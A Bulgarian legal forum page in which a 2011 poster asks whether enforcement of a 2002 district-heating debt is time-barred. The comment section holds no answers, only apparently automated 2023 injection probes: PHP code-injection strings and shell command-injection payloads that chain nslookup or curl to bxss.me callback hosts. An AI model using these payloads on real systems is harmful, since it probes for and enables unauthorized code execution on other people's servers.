Задължения към Топлофикация с давност 9 години

27.04.2011г. 11:11:21
Здравейте, На 19.04.2011г. получих Покана за доброволно плащане въз основа на Изпълнителен лист от 14.05.2002г. за задължения към Топлофикация. Мога ли да се позова на изтекла давност, какво трябва да направя и в какъв срок?

Правни мнения, съвети и коментари

lxbfYeaa
05.10.2023г. 07:27
';print(md5(31337));$a='
lxbfYeaa
05.10.2023г. 07:27
|echo mwxopi$()\ uelfnd\nz^xyu||a #' |echo mwxopi$()\ uelfnd\nz^xyu||a #|" |echo mwxopi$()\ uelfnd\nz^xyu||a #
lxbfYeaa
05.10.2023г. 07:27
";print(md5(31337));$a="
lxbfYeaa
05.10.2023г. 07:27
(nslookup -q=cname hitkphblykuwu62f8a.bxss.me||curl hitkphblykuwu62f8a.bxss.me))
lxbfYeaa
05.10.2023г. 07:27
${@print(md5(31337))}
lxbfYeaa
05.10.2023г. 07:27
$(nslookup -q=cname hitceztzfkyan3aa4e.bxss.me||curl hitceztzfkyan3aa4e.bxss.me)
lxbfYeaa
05.10.2023г. 07:27
${@print(md5(31337))}\
lxbfYeaa
05.10.2023г. 07:27
&nslookup -q=cname hitdjaufgqfqv33df3.bxss.me&'\"`0&nslookup -q=cname hitdjaufgqfqv33df3.bxss.me&`'
lxbfYeaa
05.10.2023г. 07:27
'.print(md5(31337)).'
lxbfYeaa
05.10.2023г. 07:27
&(nslookup -q=cname hitjmpaqmksyv74d0f.bxss.me||curl hitjmpaqmksyv74d0f.bxss.me)&'\"`0&(nslookup -q=cname hitjmpaqmksyv74d0f.bxss.me||curl hitjmpaqmksyv74d0f.bxss.me)&`'

Коментар